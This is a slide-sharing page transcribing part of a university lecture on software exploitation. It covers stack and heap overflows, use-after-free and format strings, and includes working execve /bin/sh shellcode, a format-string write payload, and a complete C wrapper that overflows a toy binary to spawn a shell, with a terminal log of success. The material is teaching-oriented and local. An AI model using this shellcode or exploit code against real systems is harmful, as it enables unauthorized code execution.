cs 527 software security
play

CS-527 Software Security Exploitation Asst. Prof. Mathias Payer - PowerPoint PPT Presentation

Apr 08, 2024 •41 likes •411 views

CS-527 Software Security Exploitation Asst. Prof. Mathias Payer Department of Computer Science Purdue University TA: Kyriakos Ispoglou https://nebelwelt.net/teaching/17-527-SoftSec/ Spring 2017 Exploitation: Context/Disclaimer In this module

  1. CS-527 Software Security Exploitation Asst. Prof. Mathias Payer Department of Computer Science Purdue University TA: Kyriakos Ispoglou https://nebelwelt.net/teaching/17-527-SoftSec/ Spring 2017

  2. Exploitation: Context/Disclaimer In this module we focus on exploiting actual software. We will discuss both basic and advanced exploitation techniques. For this module we assume that the given software has (i) a security-relevant vulnerability and (ii) that we know this vulnerability. You may use this knowledge to test programs locally on your own machine. It is illegal to exploit software vulnerabilities on remote machines without prior permission form the owner. Mathias Payer (Purdue University) CS-527 Software Security 2017 2 / 37

  3. Attack Vectors Table of Contents Attack Vectors 1 Code Injection: Stack 2 Code Injection: Heap 3 Code Reuse: Format string 4 Data-Only Attack 5 Summary and conclusion 6 Mathias Payer (Purdue University) CS-527 Software Security 2017 3 / 37

  4. Attack Vectors Buffer Overflow 1 void vuln ( char ∗ buf ) { char bounded [LEN] , ∗ ptr = bounded ; 2 while ( ∗ buf != 0) 3 ∗ ( ptr++) = ∗ buf++; 4 5 } Very powerful attack. Attacker overwrites stack frame with arbitrary data. Common targets: local variables, return instruction pointer, frame pointer. Allows to inject code and overwrite function pointer in one step. On the heap, the attack either targets heap data structures or adjacent objects. Mathias Payer (Purdue University) CS-527 Software Security 2017 4 / 37

  5. Attack Vectors Use After Free 1 char vuln ( char ∗ buf ) { char ∗ bounded = ( char ∗ ) malloc (LEN) , ∗ ptr = bounded ; 2 while ( ∗ buf != 0) 3 ∗ ( ptr++) = ∗ buf++; 4 f r e e ( bounded ) 5 // u s u a l l y something in between . . . 6 r e t u r n ( bounded [LEN/2] == 0) ? 1 : 0; 7 8 } Powerful attack. After a memory area has been repurposed, a stale pointer is used to either read or write from that memory object. Often used to corrupt vtable pointers (e.g., when a memory area was first an object, then a char array). Mathias Payer (Purdue University) CS-527 Software Security 2017 5 / 37

  6. Attack Vectors Format string 1 char vuln ( char ∗ buf ) { p r i n t f ( buf ) ; 2 3 } Often underestimated. Arbitrary memory writes by controlling written bytes "AAAA%1$49387c%6$hn%1$63947c%5$hn" Encode address, print, store written bytes (halfword), repeat. printf("100% not vulnerable. Or is it? \ n"); Mathias Payer (Purdue University) CS-527 Software Security 2017 6 / 37

  7. Attack Vectors Format string An attacker controlled format string results in random writes. Constraint: target address must be somewhere on the stack (if attacker-controlled format string is on the stack then addresses – without “ \ 0” can be encoded in the string itself). Format string may consume arbitrary parameters on the stack, violates stack integrity as any parameter can be read. Mathias Payer (Purdue University) CS-527 Software Security 2017 7 / 37

  8. Attack Vectors Direct overwrite 1 char vuln ( char ∗ buf , i n t index ) { buf [ index ] = 15; 2 3 } Arbitrary memory write. Used to set up larger attacks (if repeatable callable). High flexibility but both location of the source and target buffer must be known. Mathias Payer (Purdue University) CS-527 Software Security 2017 8 / 37

  9. Code Injection: Stack Table of Contents Attack Vectors 1 Code Injection: Stack 2 Code Injection: Heap 3 Code Reuse: Format string 4 Data-Only Attack 5 Summary and conclusion 6 Mathias Payer (Purdue University) CS-527 Software Security 2017 9 / 37

  10. Code Injection: Stack Code Injection First, inject shellcode somewhere into the process (e.g., a stack buffer, environment variable, argument, or heap buffer). (Ensure that buffer location is executable and known.) Redirect control-flow to the buffer. Mathias Payer (Purdue University) CS-527 Software Security 2017 10 / 37

  11. Code Injection: Stack Shellcode: from C to assembly to machine code 1 i n t s h e l l () { asm( ” \ 2 3 needle : jmp gofar \ n \ 4 goback : pop %r d i \ n \ xor %rax , %rax \ n \ 5 movb $0x3b , %a l \ n \ 6 xor %r s i , %r s i \ n \ 7 xor %rdx , %rdx \ n \ 8 s y s c a l l \ n \ 9 10 gofar : c a l l goback \ n \ 11 . s t r i n g \ ”/ bin / sh \ ” \ n \ 12 ” ) ; 13 } 14 15 i n t main () { s h e l l () ; 16 17 } Mathias Payer (Purdue University) CS-527 Software Security 2017 11 / 37

  12. Code Injection: Stack Shellcode 1 00000000004004 f1 < needle > : 4004 f1 : eb 0e jmp 400501 < gofar > 2 3 4 00000000004004 f3 < goback > : 4004 f3 : 5 f pop %r d i 5 4004 f4 : 48 31 c0 xor %rax ,% rax 6 4004 f7 : b0 3b mov $0x3b ,% a l 7 4004 f9 : 48 31 f6 xor %r s i ,% r s i 8 4004 f c : 48 31 d2 xor %rdx ,% rdx 9 4004 f f : 0 f 05 s y s c a l l 10 11 12 0000000000400501 < gofar > : 400501: e8 ed f f f f f f c a l l q 4004 f3 < goback > 13 400506: 2 f ( bad ) 14 400507: 62 ( bad ) 15 400508: 69 6e 2 f 73 68 00 5d imul $0x5d006873 ,0 x2f 16 (% r s i ) ,%ebp Mathias Payer (Purdue University) CS-527 Software Security 2017 12 / 37

  13. Code Injection: Stack Code Injection: Stack 1 i n t main ( i n t argc , char ∗ argv [ ] ) { char cookie [ 3 2 ] ; 2 p r i n t f ( ” Give me a cookie (%p , %p) \ n” , cookie , getenv ( ” 3 EGG” ) ) ; s t r c p y ( cookie , argv [ 1 ] ) ; 4 p r i n t f ( ”Thanks f o r the %s \ n” , cookie ) ; 5 r e t u r n 0; 6 7 } 8 9 // Compile : gcc − g − fno − stack − p r o t e c t o r − z execstack stack . c − o s i n j 10 // Run w/o ASLR : s e t a r c h ‘ arch ‘ − R ./ s i n j Mathias Payer (Purdue University) CS-527 Software Security 2017 13 / 37

  14. Code Injection: Stack Code Injection: Stack 1 00000000004005 cd < main > : 2 4005 cd : 55 push %rbp 3 4005 ce : 48 89 e5 mov %rsp ,%rbp 4 4005 d1 : 48 83 ec 30 sub $0x30 ,% rsp 5 4005 d5 : 89 7d dc mov %edi , − 0x24(%rbp ) 6 4005 d8 : 48 89 75 d0 mov %r s i , − 0x30(%rbp ) 7 4005 dc : bf c4 06 40 00 mov $0x4006c4 ,% e d i 8 4005 e1 : e8 aa f e f f f f c a l l q 400490 < getenv@plt > 9 4005 e6 : 48 89 c2 mov %rax ,% rdx 10 4005 e9 : 48 8d 45 e0 l e a − 0x20(%rbp ) ,% rax 11 4005 ed : 48 89 c6 mov %rax ,% r s i 12 4005 f0 : bf c8 06 40 00 mov $0x4006c8 ,% e d i 13 4005 f5 : b8 00 00 00 00 mov $0x0 ,%eax 14 4005 fa : e8 b1 f e f f f f c a l l q 4004 b0 < p r i n t f @ p l t > 15 4005 f f : 48 8b 45 d0 mov − 0x30(%rbp ) ,% rax 16 400603: 48 83 c0 08 add $0x8 ,% rax 17 400607: 48 8b 10 mov (%rax ) ,% rdx 18 40060 a : 48 8d 45 e0 l e a − 0x20(%rbp ) ,% rax 19 40060 e : 48 89 d6 mov %rdx ,% r s i 20 400611: 48 89 c7 mov %rax ,% r d i 21 400614: e8 87 f e f f f f c a l l q 4004 a0 < s t r c p y @ p l t > 22 400619: 48 8d 45 e0 l e a − 0x20(%rbp ) ,% rax 23 40061d : 48 89 c6 mov %rax ,% r s i 24 400620: bf e3 06 40 00 mov $0x4006e3 ,% e d i 25 400625: b8 00 00 00 00 mov $0x0 ,%eax 26 40062 a : e8 81 f e f f f f c a l l q 4004 b0 < p r i n t f @ p l t > 27 40062 f : b8 00 00 00 00 mov $0x0 ,%eax 28 400634: c9 l e a v e q 29 400635: c3 r e t q Mathias Payer (Purdue University) CS-527 Software Security 2017 14 / 37

  15. Code Injection: Stack Wrapper 1 #d e f i n e BUFSIZE 0x20 2 #d e f i n e EGGLOC 0 x 7 f f f f f f f e f c 8 3 i n t main ( i n t argc , char ∗ argv [ ] ) { 4 char s h e l l c o d e [ ] = ”EGG=” 5 ” \ xeb \ x0e ” // jump +0xe (+14) 6 ” \ x5f ” // push %r d i 7 ” \ x48 \ x31 \ xc0 ” // xor %rax , %rax 8 ” \ xb0 \ x3b” // mov $0x3b , %a l 9 ” \ x48 \ x31 \ xf6 ” // xor %r s i , %r s i 10 ” \ x48 \ x31 \ xd2” // xor %rdx , %rdx 11 ” \ x0f \ x05” // s y s c a l l 12 ” \ xe8 \ xed \ x f f \ x f f \ x f f \ x2f ” // c a l l 0 xed ( − 19) 13 ” \ x62 \ x69 \ x6e \ x2f \ x73 \ x68 \ x00 \ x5d” ; // / bin / bash+ \ 0 14 15 // f i l l b u f f e r + ebp with 0x41 ’ s 16 char buf [ 2 5 6 ] ; 17 f o r ( i n t i = 0; i < BUFSIZE+s i z e o f ( void ∗ ) ; buf [ i ++] = ’A ’ ) ; 18 19 // o v e r w r i t e RIP with eggloc 20 char ∗∗ b u f f = ( char ∗∗ )(&buf [ BUFSIZE+s i z e o f ( void ∗ ) ] ) ; 21 ∗ ( b u f f++) = ( void ∗ )EGGLOC; 22 ∗ b u f f = ( void ∗ )0x0 ; 23 24 // setup e x e c u t i o n environment and f i r e e x p l o i t 25 char ∗ args [ 3 ] = { ” ./ s i n j ” , buf , NULL } ; 26 char ∗ envp [ 2 ] = { s h e l l c o d e , NULL } ; 27 execve ( ” . / s i n j ” , args , envp ) ; 28 r e t u r n 0; 29 } Mathias Payer (Purdue University) CS-527 Software Security 2017 15 / 37

  16. Code Injection: Stack Stack code injection gannimo@localhost:~/repos/teach/CS527/examples{0}$ \ setarch x86_64 -R ./stack-ci-wrapper Give me a cookie (0x7fffffffed10, 0x7fffffffefd3) Thanks for the AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA $ whoami gannimo $ exit Mathias Payer (Purdue University) CS-527 Software Security 2017 16 / 37

  17. Code Injection: Heap Table of Contents Attack Vectors 1 Code Injection: Stack 2 Code Injection: Heap 3 Code Reuse: Format string 4 Data-Only Attack 5 Summary and conclusion 6 Mathias Payer (Purdue University) CS-527 Software Security 2017 17 / 37

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

deel 2 sws1 1 Software and Web Security - 1 &amp; 2 Software is the main source of security

deel 2 sws1 1 Software and Web Security - 1 &amp; 2 Software is the main source of security

Software and Web Security deel 2 sws1 1 Software and Web Security - 1 &amp; 2 Software is the main source of security vulnerabilities esp in systems accessible via a network part 1 security problems in machine code, compiled from C(++)

1.35k views • 67 slides
Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software

Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software

1 Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software is the main source of security vulnerabilities esp in systems accessible via a network i t ibl i t k part 1 part 1 security problems

672 views • 65 slides
Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software

Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software

Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software Engineering Spring 2012 What is the talk NOT about? Cryptography. Database security. Operating Systems security. Network security.

1.37k views • 121 slides
Software Security: Defenses &amp; Principles CS 161: Computer Security Prof. Vern Paxson TAs:

Software Security: Defenses &amp; Principles CS 161: Computer Security Prof. Vern Paxson TAs:

Software Security: Defenses &amp; Principles CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed &amp; Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ January 25, 2011 Testing for Software Security Issues

444 views • 42 slides
Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust

Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust

Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust Boundary Attacks Threats Application Attacker Exploit Vulnerability : a software defect with security consequences Threat : a potential danger to

1.54k views • 80 slides
Software In-Security Buffer overflows Overview Web Application security Malware OS

Software In-Security Buffer overflows Overview Web Application security Malware OS

Lecture overview Table of contents: Introduction to SW security Software In-Security Buffer overflows Overview Web Application security Malware OS security topics Code scanning Emmanuel Benoist Taught by Ulrich

479 views • 13 slides
CS-412 Software Security Introduction Mathias Payer EPFL, Spring 2019 Mathias Payer CS-412

CS-412 Software Security Introduction Mathias Payer EPFL, Spring 2019 Mathias Payer CS-412

CS-412 Software Security Introduction Mathias Payer EPFL, Spring 2019 Mathias Payer CS-412 Software Security Course outline Secure software lifecycle Security policies Attack vectors Defense strategies: mitigations and testing Case

681 views • 49 slides
CS412 Software Security Secure Software Lifecycle Mathias Payer EPFL, Spring 2019 Mathias Payer

CS412 Software Security Secure Software Lifecycle Mathias Payer EPFL, Spring 2019 Mathias Payer

CS412 Software Security Secure Software Lifecycle Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Software liveliness Software is not a one-shot effort Software development, production, and maintenance are cost/labor

449 views • 23 slides
CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Web (and internet) security: two views Just a long running network service Complex application with multiple layers and components.

577 views • 47 slides
Introduction Gang Tan Penn State University Spring 2019 CMPSC 447: Software Security Why a

Introduction Gang Tan Penn State University Spring 2019 CMPSC 447: Software Security Why a

Introduction Gang Tan Penn State University Spring 2019 CMPSC 447: Software Security Why a course on software security? Software plays a major role in the modern society But is a major source of security problems. Software is the

659 views • 30 slides
Secure Software Development TDDC90 Software Security Ulf Kargn Institutionen fr

Secure Software Development TDDC90 Software Security Ulf Kargn Institutionen fr

Secure Software Development TDDC90 Software Security Ulf Kargn Institutionen fr Datavetenskap (IDA) Avdelningen fr Databas- och Informationsteknik (ADIT) Original slides by Marcus Bendtsen Agenda Securing the software

1.91k views • 65 slides
Chapter 11 Software Security Secure programs Security implies some degree of trust that the

Chapter 11 Software Security Secure programs Security implies some degree of trust that the

Chapter 11 Software Security Secure programs Security implies some degree of trust that the program enforces expected C onfidentiality I ntegrity A vailability How can we look at software component and assess its

837 views • 49 slides
CS527 Software Security Secure Software Lifecycle Mathias Payer Purdue University, Spring 2018

CS527 Software Security Secure Software Lifecycle Mathias Payer Purdue University, Spring 2018

CS527 Software Security Secure Software Lifecycle Mathias Payer Purdue University, Spring 2018 Mathias Payer CS527 Software Security Software liveliness Software is not a one-shot effort Software development, production, and maintenance are

725 views • 23 slides
Web Security TDDC90 Software Security Ulf Kargn Institutionen fr Datavetenskap (IDA)

Web Security TDDC90 Software Security Ulf Kargn Institutionen fr Datavetenskap (IDA)

Web Security TDDC90 Software Security Ulf Kargn Institutionen fr Datavetenskap (IDA) Avdelningen fr Databas- och Informationsteknik (ADIT) Original slides by Marcus Bendtsen Some recent attacks 2 A game changer The Internet

1.17k views • 87 slides
Software Security Return to Libc and ROP Jan Nordholz Prof. Jean-Pierre Seifert Security in

Software Security Return to Libc and ROP Jan Nordholz Prof. Jean-Pierre Seifert Security in

Software Security Return to Libc and ROP Jan Nordholz Prof. Jean-Pierre Seifert Security in Telecommunications TU Berlin SoSe 2014 jan (sect) Software Security SoSe 2014 1 / 13 Recap: Overflow Bugs Ingredients: fixed-size buffer on the

429 views • 13 slides
CS527 Software Security Web Security Mathias Payer Purdue University, Spring 2018 Mathias Payer

CS527 Software Security Web Security Mathias Payer Purdue University, Spring 2018 Mathias Payer

CS527 Software Security Web Security Mathias Payer Purdue University, Spring 2018 Mathias Payer CS527 Software Security Daemons / Services / Servers A daemon is a long running service that serves outside requests. A web server, a mail

503 views • 31 slides
So#ware Synthesis with ACL2 Eric Smith Kestrel Ins9tute

So#ware Synthesis with ACL2 Eric Smith Kestrel Ins9tute

So#ware Synthesis with ACL2 Eric Smith Kestrel Ins9tute ACL2 Workshop 2015 Outline Overview of Refinement-Based Synthesis Proof-EmiJng Transforma9ons

460 views • 21 slides
Middleware Reliability Implementations and Connector Wrappers Authors: Jesse Sowell and Kurt

Middleware Reliability Implementations and Connector Wrappers Authors: Jesse Sowell and Kurt

Middleware Reliability Implementations and Connector Wrappers Authors: Jesse Sowell and Kurt Stirewalt Presented by: Jesse Sowell Overview Context: Adding new features to distributed applications by extending middleware Behavioural

394 views • 7 slides
Lecture 27: Tools, trends, and concluding thoughts David Bindel 3 May 2010 Some take-aways

Lecture 27: Tools, trends, and concluding thoughts David Bindel 3 May 2010 Some take-aways

Lecture 27: Tools, trends, and concluding thoughts David Bindel 3 May 2010 Some take-aways Knowledge of some programming models (message passing, threads) A little computer architecture (memory and communication costs) Some

322 views • 14 slides
CSSE 220 Day 3 Arrays, ArrayLists, Wrapper Classes,

CSSE 220 Day 3 Arrays, ArrayLists, Wrapper Classes,

CSSE 220 Day 3 Arrays, ArrayLists, Wrapper Classes, Auto-boxing, Enhanced for loop Check out ArraysListPractice from SVN Questions? Getting Help This year weve

574 views • 34 slides
MPI on ARCHER Documentation See https://www.archer.ac.uk/documentation/user-guide/

MPI on ARCHER Documentation See https://www.archer.ac.uk/documentation/user-guide/

MPI on ARCHER Documentation See https://www.archer.ac.uk/documentation/user-guide/ Accessing the service Resource Allocation and Job Execution Access SSH access : ssh X login.archer.ac.uk flag -X ensures graphics are sent

476 views • 20 slides
Mapping the hadronization description in the Pythia MCEG to the correlation functions of TMD

Mapping the hadronization description in the Pythia MCEG to the correlation functions of TMD

Mapping the hadronization description in the Pythia MCEG to the correlation functions of TMD factorization NP HEP 3D Nucleon Tomography Workshop, March 15th 17th 2017 LDRD project at Jefferson Lab LDRD : Study of hadronization L

433 views • 30 slides
Data Abstraction Software Development. Review of Java Constructs. Janyl Jumadinova September

Data Abstraction Software Development. Review of Java Constructs. Janyl Jumadinova September

Data Abstraction Software Development. Review of Java Constructs. Janyl Jumadinova September 1416, 2020 Janyl Jumadinova Data Abstraction Software Development. Review of Java Constructs. September 1416, 2020 1 / 17 Collections

366 views • 33 slides
PostgreSQL SQL-MED Ibrar Ahmed Senior Software Engineer @ Percona PostgreSQL Consultant What?

PostgreSQL SQL-MED Ibrar Ahmed Senior Software Engineer @ Percona PostgreSQL Consultant What?

PostgreSQL SQL-MED Ibrar Ahmed Senior Software Engineer @ Percona PostgreSQL Consultant What? Is an relational database Licence PostgreSQL: Released under the PostgreSQL management system (RDBMS) License. (Similar to the BSD or MIT)

232 views • 10 slides

More recommend